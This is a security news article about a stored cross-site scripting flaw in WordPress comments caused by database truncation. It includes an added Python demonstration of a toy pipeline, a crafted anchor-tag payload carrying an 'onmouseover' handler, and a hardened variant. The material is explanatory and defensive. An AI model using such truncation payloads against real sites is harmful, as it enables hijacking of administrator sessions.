
Stored XSS bug in WordPress, researchers advise to disable comments


A stored cross-site scripting (XSS) vulnerability impacting current WordPress versions has been identified by Jouko Pynnönen, a researcher with Finnish IT company Klikki Oy.

Essentially, JavaScript injected into the comments section of a WordPress website is executed in the browser of anyone who views the comment, according to a Sunday post. Because the script runs with the viewer's own session, a comment viewed by a logged-in administrator can be leveraged for various purposes, such as gaining administrator privileges.

“If the comment text is long enough, it will be truncated when inserted in the database,” the post stated, adding that “the truncation results in malformed HTML generated on the page” and that “the attacker can supply any attributes in the allowed HTML tags.” In other words, a comment that passes the input filter as well-formed markup is cut mid-tag on the way into the database, and the unclosed tag is later served to visitors as broken markup rather than the markup that was actually approved.
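The following is an added example, not Klikki Oy's proof of concept and not WordPress code. It models the kind of pipeline the quoted description implies in three assumed steps: an allow-list sanitiser on input, a storage column that silently truncates over-long values (a hypothetical 160-byte limit stands in for a real column), and an output-time typographic filter that rewrites straight apostrophes outside recognised tags into curly-quote entities (an assumption modelled on the quote conversion WordPress applies to comment text). The payload is constructed: a well-formed, allow-listed `<a>` whose `title` value carries extra attribute text plus padding that pushes the closing quote past the limit. Python's `html.parser` stands in for the browser's tokeniser.

```python
import html
import re
from html.parser import HTMLParser

# Toy comment pipeline, constructed for this example (not WordPress's code).
ALLOWED_TAGS = {"a": {"href", "title"}}
COLUMN_LIMIT = 160  # hypothetical column size in bytes; real columns are far larger

# A tag is accepted only if every attribute is name='quoted' or name="quoted".
TAG_RE = re.compile(r"<(/?)([A-Za-z]+)((?:\s+[A-Za-z]+=(?:'[^']*'|\"[^\"]*\"))*)\s*>")
ATTR_RE = re.compile(r"([A-Za-z]+)=('[^']*'|\"[^\"]*\")")


def input_filter(text: str) -> str:
    """Allow-list sanitiser applied on the way in: keeps allowed tags whose
    attributes are allowed and quoted, HTML-escapes everything else."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()], quote=False))
        slash, name, attrs = m.group(1), m.group(2).lower(), m.group(3)
        if name in ALLOWED_TAGS:
            kept = [f"{k}={v}" for k, v in ATTR_RE.findall(attrs)
                    if k.lower() in ALLOWED_TAGS[name]]
            out.append(f"<{slash}{name}{' ' if kept else ''}{' '.join(kept)}>")
        else:
            out.append(html.escape(m.group(0), quote=False))
        pos = m.end()
    out.append(html.escape(text[pos:], quote=False))
    return "".join(out)


def store(sanitised: str, limit: int = COLUMN_LIMIT) -> str:
    """Models a database column that silently truncates over-long values."""
    return sanitised.encode("utf-8")[:limit].decode("utf-8", "ignore")


def output_texturize(stored: str) -> str:
    """Models a typographic filter on output (assumed, see lead-in): text inside
    recognised tags (those with a closing '>') is left alone, straight
    apostrophes elsewhere become curly-quote entities. A truncated tag has no
    '>' and so is treated as text, which is the whole problem."""
    parts = re.split(r"(<[^>]*>)", stored)
    return "".join(p if p.startswith("<") and p.endswith(">")
                   else p.replace("'", "&#8217;") for p in parts)


def render(comment_html: str) -> str:
    """The page as the browser receives it: the comment followed by more markup."""
    return f"<p>{comment_html}</p><p>next comment</p>"


class _StartTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def browser_attributes(page: str) -> list:
    """Approximates browser tokenisation; returns (tag, {attr: value}) pairs."""
    p = _StartTags()
    p.feed(page)
    p.close()
    return p.tags


def script_attributes(page: str) -> list:
    """Names of event-handler attributes the browser model sees on any tag."""
    return [name for _, attrs in browser_attributes(page)
            for name in attrs if name.startswith("on")]


def vulnerable_pipeline(comment: str) -> str:
    """Sanitise, store (truncating), texturise: the order the quote describes."""
    return output_texturize(store(input_filter(comment)))


def exceeds_column(comment: str) -> bool:
    """True if the sanitised comment would be cut by the column limit."""
    return len(input_filter(comment).encode("utf-8")) > COLUMN_LIMIT


def hardened_pipeline(comment: str) -> str:
    """Added hardening (not WordPress's actual fix): refuse anything the column
    could truncate, so what is stored is exactly what the sanitiser approved."""
    if exceeds_column(comment):
        raise ValueError("comment too long for storage; rejected, not truncated")
    return output_texturize(store(input_filter(comment)))


# Constructed payload: the closing quote of title lands beyond COLUMN_LIMIT.
PAYLOAD = ("<a title='x onmouseover=alert(1) style=position:absolute;"
           "width:100%;height:100%;top:0;left:0 " + "A" * 200 + "'>click</a>")

if __name__ == "__main__":
    page = render(vulnerable_pipeline(PAYLOAD))
    print(page[:120] + "...")
    print("event handlers seen by the browser model:", script_attributes(page))
    print("hardened pipeline rejects it:", exceeds_column(PAYLOAD))
```

The vulnerable run shows why the approved `title='...'` attribute turns into live markup: once the closing quote is truncated away, the output filter no longer recognises `<a title='...` as a tag, rewrites the lone apostrophe to `&#8217;`, and the browser then reads `title=&#8217;x` as an unquoted value followed by a separate `onmouseover` attribute. The same payload under the length limit stays a single harmless `title` attribute, which is why the hardened variant only needs to refuse input the store would truncate.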

WordPress website operators should disable comments, or at least not approve any comments, to prevent being affected by the issue, according to the Klikki Oy post. Note that, by default, WordPress automatically approves further comments from an author who already has one approved comment, so approving even a single harmless-looking comment is enough to let that author's later comments through without review.
